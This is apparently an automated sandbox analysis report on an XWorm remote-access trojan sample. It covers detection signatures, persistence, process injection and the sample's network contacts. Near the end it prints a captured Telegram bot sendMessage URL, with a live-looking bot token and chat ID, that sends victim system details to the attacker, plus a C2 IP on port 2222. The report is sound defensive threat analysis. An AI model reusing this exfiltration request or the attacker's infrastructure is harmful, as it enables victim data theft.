Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00E7416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 10_2_00E7416A
Source: C:\Users\user\Desktop\DA92phBHUS.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: RegAsm.exe, 00000017.00000002.2972830964.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
OS version to string mapping found (often used in BOTs)
Source: ImageSyncProX.scr Binary or memory string: WIN_81
Source: ImageSyncProX.scr Binary or memory string: WIN_XP
Source: ImageSyncProX.scr Binary or memory string: WIN_XPe
Source: ImageSyncProX.scr Binary or memory string: WIN_VISTA
Source: ImageSyncProX.scr Binary or memory string: WIN_7
Source: ImageSyncProX.scr Binary or memory string: WIN_8
Source: Dump.pif.1.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 23.2.RegAsm.exe.1030000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.Dump.pif.151caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2973858744.000000000303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2973689735.0000000001473000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.00000000014B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2672114464.000000000151C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617476989.0000000001513000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2617544523.0000000001527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Dump.pif PID: 5432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 10_2_00EB696E
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif Code function: 10_2_00EB6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 10_2_00EB6E32
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_0036696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 18_2_0036696E
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr Code function: 18_2_00366E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 18_2_00366E32
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544503 Sample: DA92phBHUS.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 53 api.telegram.org 2->53 55 nAtuEYczbaU.nAtuEYczbaU 2->55 57 206.23.85.13.in-addr.arpa 2->57 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 79 17 other signatures 2->79 10 DA92phBHUS.exe 18 2->10         started        12 wscript.exe 1 2->12         started        signatures3 77 Uses the Telegram API (likely for C&C communication) 53->77 process4 signatures5 15 cmd.exe 3 10->15         started        87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->87 19 ImageSyncProX.scr 12->19         started        process6 file7 51 C:\Users\user\AppData\Local\Temp\...\Dump.pif, PE32 15->51 dropped 63 Drops PE files with a suspicious file extension 15->63 65 Uses schtasks.exe or at.exe to add and modify task schedules 15->65 21 Dump.pif 5 15->21         started        25 cmd.exe 2 15->25         started        27 conhost.exe 15->27         started        29 7 other processes 15->29 signatures8 process9 file10 45 C:\Users\user\AppData\...\ImageSyncProX.scr, PE32 21->45 dropped 47 C:\Users\user\AppData\...\ImageSyncProX.js, ASCII 21->47 dropped 49 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 21->49 dropped 81 Drops PE files with a suspicious file extension 21->81 83 Writes to foreign memory regions 21->83 85 Injects a PE file into a foreign processes 21->85 31 RegAsm.exe 15 2 21->31         started        35 cmd.exe 1 21->35         started        37 schtasks.exe 1 21->37         started        signatures11 process12 dnsIp13 59 api.telegram.org 149.154.167.220, 443, 64427 TELEGRAMRU United Kingdom 31->59 61 193.41.226.233, 2222, 64431 AVORODE unknown 31->61 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->67 69 Protects its processes via BreakOnTermination flag 31->69 39 conhost.exe 35->39         started        41 schtasks.exe 1 35->41         started        43 conhost.exe 37->43         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
193.41.226.233
 unknown unknown
60548 AVORODE true

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true
nAtuEYczbaU.nAtuEYczbaU unknown unknown
206.23.85.13.in-addr.arpa unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
193.41.226.233 true
    		unknown
    https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6 true
      		unknown